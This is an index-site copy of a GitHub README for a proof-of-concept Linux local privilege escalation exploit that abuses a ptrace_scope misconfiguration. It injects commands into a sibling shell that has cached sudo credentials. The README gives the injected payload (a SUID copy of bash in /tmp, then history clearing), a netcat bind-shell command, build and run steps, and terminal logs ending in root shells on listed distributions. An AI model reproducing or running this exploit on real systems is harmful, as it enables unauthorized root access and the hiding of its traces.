Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/therealdreg/ptrace_misconfiguration_local_privilege_escalation

ptrace misconfiguration Local Privilege Escalation
https://github.com/therealdreg/ptrace_misconfiguration_local_privilege_escalation

linux privilege-escalation-linux ptrace-injection x86 x86-64

Last synced: about 1 month ago
JSON representation

ptrace misconfiguration Local Privilege Escalation

Awesome Lists containing this project

README 

        
# ptrace misconfiguration local privilege escalation

ptrace misconfiguration Local Privilege Escalation



Please, consider make a donation: https://github.com/sponsors/therealdreg



WARNING! this is a POC, the code is CRAP



why this POC? why ptrace for this? just for fun. I know, I know you can get the sudo control in other different ways x)



video demo on youtube: https://youtu.be/3Qmy1Y8W7A8



Injecting code via ptrace (with same user) in shells with sudo authenticated



Exploit Reqs:

* ptrace enable to attach the processes of the user

* terminal with a sudo user group (attacker)

* terminal with the same user & sudo authenticated (victim)

* run xpk or ptrex 



WARNING: if GDB is installed in the machine is more safe run https://www.exploit-db.com/exploits/46989



'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)



my code is based in the s4vitar & vowkin POC and use ptrace (no GDB dep).



I made two POC-flavours for the same thing xpk.c & ptrex.c



Do you want a more advanced stuff? check https://github.com/David-Reguera-Garcia-Dreg/drx_ptrace_shellcode_injector



## xpk.c

stdin hijack (using ptrace_do lib https://github.com/emptymonkey/ptrace_do): sudo -S cp /bin/bash /tmp + sudo -S chmod +s /tmp/bash + history -c 

```

gcc -o xpk xpk.c

./xpk

```



WARNING: only works for x86_64 systems (ptrace_do limitation)



* can inject code from x86_64-xpk-compiled to x86_64 process

* can inject code from x86_64-xpk-compiled to x86 process



## ptrex.c:

shellcode injection (using ptrace) execve(python -c import os; os.system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")); 

```

gcc -o ptrex ptrex.c

 ./ptrex 

```



You can also inject your own python code: 



./ptrex full_python_path newcmdline



Example with 

* own python binary (limit 150 bytes): /home/dreg/tmp/python

* bind bash shell python code (limit 250 bytes) : import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")

```

./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

```



* works for x86_64 systems & x86 systems

* can inject code from x86_64-ptrex-compiled to x86_64 process

* can inject code from x86-ptrex-compiled to x86 process

* can inject code from x86_64-ptrex-compiled to x86 process



WARNING: inject code from x86-ptrex-compiled to x86_x64 process is not possible



## How to test xpk.c:

Open a terminal with a sudo user group



execute any command with sudo and enter the password, ex:

```

dreg@fr33project:~$ tty

/dev/pts/4

dreg@fr33project:~$ id

uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)

dreg@fr33project:~$ sudo whoami

[sudo] password for dreg:

root

dreg@fr33project:~$ 

```



open other terminal with the same user and execute ./xpk (the name of the exploit executable is important, dont change!)

```

dreg@fr33project:~$ tty

/dev/pts/7

dreg@fr33project:~$ .gcc -o xpk xpk.c

dreg@fr33project:~$ ./xpk

David Reguera Garcia aka Dreg exploit without gdb dep, based in:

https://www.exploit-db.com/exploits/46989

'ptrace_scope' misconfiguration Local Privilege Escalation

Authors: Marcelo Vazquez  (s4vitar)

         Victor Lasa       (vowkin)



[*] PID -> bash

[*] Path 2660: /home/dreg

stdin fd: 4

echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] PID -> bash

[*] Path 2892: /home/dreg

stdin fd: 4

echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] PID -> sh

[*] Path 2998: /home/dreg

stdin fd: 4

echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] PID -> bash

[*] Path 2999: /home/dreg

stdin fd: 4

echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap



[*] Cleaning up...

[*] Spawning root shell...

bash-5.0# id

uid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)

bash-5.0# whoami

root

bash-5.0#

```



## How to test ptrex.c:

Open a terminal with a sudo user group



execute any command with sudo and enter the password, ex:

```

dreg@fr33project:~$ tty

/dev/pts/4

dreg@fr33project:~$ id

uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)

dreg@fr33project:~$ sudo whoami

[sudo] password for dreg:

root

dreg@fr33project:~$ 

```



open other terminal with the same user and execute ./ptrex

```

dreg@fr33project:~$ tty

/dev/pts/7

dreg@fr33project:~$ .gcc -o ptrex ptrex.c

dreg@fr33project:~$ ./ptrex

ptrex v0.3-beta - MIT License - Copyright 2020

David Reguera Garcia aka Dreg - [email protected]

http://github.com/David-Reguera-Garcia-Dreg/ - http://www.fr33project.org/

-

ptrace misconfiguration Local Privilege Escalation

using ptrace (no GDB dep) execve

-

Based from: https://www.exploit-db.com/exploits/46989

'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)



To change default python path & cmd injected: ./ptrex full_python_path newcmdline

    example: ./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'



/proc/sys/kernel/yama/ptrace_scope : 0

pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d'

current pid: 18888

skipping current shell pid: 18888

current pid: 20156

elf plat: 64

waiting for process

getting registers

injecting shellcode at: 0x00007f33a88890e9

setting instruction pointer to: 0x00007f33a88890e9

runing

please wait...

found suid shell: /tmp/bash

rooting.....

/tmp/bash -p -c 'rm /tmp/bash ; tput cnorm && /bin/bash -p'



bash-5.0# whoami

root

bash-5.0#

```



If this fail, try the bind shell example



### Example ptrex.c bind shell netcat



This example needs netcat installed in the machine



Open a terminal with a sudo user group



execute any command with sudo and enter the password, ex:

```

dreg@fr33project:~$ tty

/dev/pts/4

dreg@fr33project:~$ id

uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)

dreg@fr33project:~$ sudo whoami

[sudo] password for dreg:

root

dreg@fr33project:~$ 

```



open other terminal with the same user and execute ./ptrex

```

dreg@fr33project:~$ tty

/dev/pts/7

dreg@fr33project:~$ .gcc -o ptrex ptrex.c

dreg@fr33project:~$ ./ptrex /usr/bin/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

dreg@fr33project:~$ nc 127.0.0.1 444

whoami

root

```



## WORKING ON:



* Parrot Home/Workstation: 4.6 

* Parrot Security: 4.6 

*	CentOS / RedHat: 7.6 

*	Kali Linux: 2018.4 

* Debian GNU/Linux: 10 (buster), 9.13 (stretch)



## CONTRIBUTORS



nobody loves me



## TODO